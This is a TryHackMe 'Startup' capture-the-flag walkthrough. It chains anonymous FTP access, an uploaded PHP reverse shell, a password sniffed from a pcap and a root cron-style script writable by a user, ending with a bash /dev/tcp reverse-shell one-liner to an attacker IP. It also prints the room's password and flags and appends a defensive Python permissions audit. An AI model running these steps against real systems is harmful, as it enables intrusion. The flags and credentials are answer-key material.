TryHackMe: Startup

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!

Information

Room: Startup
Difficulty: Medium

Best to use a Kali Virtual Machine as all tools are installed.

Walkthrough

- Identifying Vulnerabilities & Reverse Shell

First, we need to identify the vulnerabilities on the server. We can look for open ports with nmap:

    nmap -sV -Pn 10.10.197.1

The following ports are open:

Now we can try to log in to the FTP server using anonymous/anonymous as the credentials.

    ftp 10.10.197.1

Once logged in, we can list the current directory and download the files:

    get notice.txt
    get important.jpg

Since there is nothing else on the FTP share, we can close the connection for now. Next, we enumerate the HTTP port:

    gobuster dir -u http://10.10.197.1 -w /usr/share/wordlists/dirb/common.txt

The contents of the /files directory are the same as those on the FTP server, which means the anonymous-writable FTP share is served by the web server. We can upload a PHP reverse shell over FTP and start a listener in our terminal:

    cp /usr/share/webshells/php/php-reverse-shell.php .
    # edit the copy: set $ip to your attacking machine's address (the default $port is 1234)
    ftp 10.10.197.1
    # log in as anonymous/anonymous
    cd ftp
    put php-reverse-shell.php
    # quit the FTP session, then start the listener
    nc -lvnp 1234

Then we can exit FTP and open /files/php-reverse-shell.php in a web browser. The netcat listener should receive the shell.

1. What is the secret spicy soup recipe?

Once we are in the reverse shell, the current directory contains a file called ‘recipe.txt’.

    cat recipe.txt

Answer: Love

2. What are the contents of user.txt?

So far we do not have the permissions to explore much of the filesystem. If we look at the directory again, there is another folder owned by the same user as ‘recipe.txt’:

Inside this folder is a capture file called ‘suspicious.pcapng’. Simply running ‘grep password suspicious.pcapng’ already returns a match, so a password was sent in cleartext. We can read the surrounding bytes with xxd to recover the credentials:

    xxd -c 40 suspicious.pcapng | grep -i password -A 10

We have a password. First we need to spawn an interactive TTY with Python so that su can prompt for it; then we can try the password against www-data and, when that fails, against lennie:

    python3 -c 'import pty; pty.spawn("/bin/sh")'
    su www-data   # fails
    su lennie     # password: c4ntg3t3n0ughsp1c3
    cd /home/lennie

Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

3. What are the contents of root.txt?

Whilst we are still in Lennie’s home directory, we can see that he has a folder called ‘scripts’. Inside that folder are two files. We can print them to see what they are used for:

    cat scripts/*

The file planner.sh is owned by root and, when executed, runs another file, /etc/print.sh, which is owned by lennie. A root-run script that calls a file a non-root user can write is the misconfiguration here: we can replace the contents of /etc/print.sh with a reverse shell, which will come back to us as root:

    echo 'bash -i >& /dev/tcp/10.9.1.162/5678 0>&1' > /etc/print.sh
    # on your attacking machine (10.9.1.162 here):
    nc -lvnp 5678

And here’s the flag!

Answer: THM{f963aaa6a430f210222158ae15c3d76d}
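As an added example that is not part of the original walkthrough, here is a small Python audit a defender could run to flag the root cause behind this last step: a root-owned script that calls a file some other user owns, or that is group/world writable. The sample planner.sh text, the uid 1002 and the fake filesystem map are constructed; audit_script runs the same check against the live filesystem.

```python
import os
import re
import stat

# Absolute paths referenced in a shell script, e.g. /etc/print.sh.
PATH_RE = re.compile(r"(?<![\w.-])(/[\w./-]+)")

def referenced_paths(script_text):
    """Absolute paths the script references, in order, without duplicates."""
    seen = []
    for line in script_text.splitlines():
        # Keep the shebang (its interpreter matters too); drop other comments.
        code = line if line.startswith("#!") else line.split("#", 1)[0]
        for path in PATH_RE.findall(code):
            if path not in seen:
                seen.append(path)
    return seen

def risky_targets(script_text, lookup, root_uid=0):
    """Map each referenced path to a reason if someone other than root can change it.
    lookup(path) returns (uid, mode) or None when the path does not exist."""
    findings = {}
    for path in referenced_paths(script_text):
        info = lookup(path)
        if info is None:
            continue
        uid, mode = info
        if uid != root_uid:
            findings[path] = f"owned by uid {uid}, not root"
        elif mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings[path] = f"group/world writable (mode {oct(mode & 0o777)})"
    return findings

def os_lookup(path):
    # Live-filesystem lookup; None for paths that do not exist on this host.
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_mode

def audit_script(script_path):
    """Check a script on the live host, e.g. audit_script('/home/lennie/scripts/planner.sh')."""
    with open(script_path) as fh:
        return risky_targets(fh.read(), os_lookup)

# Constructed sample modelled on the room: root's planner.sh calls /etc/print.sh,
# which belongs to the unprivileged user lennie (uid 1002 is an assumed value).
SAMPLE_PLANNER = '#!/bin/bash\necho "Planning..."\n/etc/print.sh\n'
SAMPLE_FS = {"/bin/bash": (0, 0o100755), "/etc/print.sh": (1002, 0o100755)}
```

The fix the audit points at is to make /etc/print.sh root-owned and not writable by group or others, after which risky_targets returns nothing for this script.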

TLDR

– This is a good machine for absolute beginners.
– Use nmap to view open ports.
– Upload a reverse shell via FTP.
– Privilege escalation via file permissions!
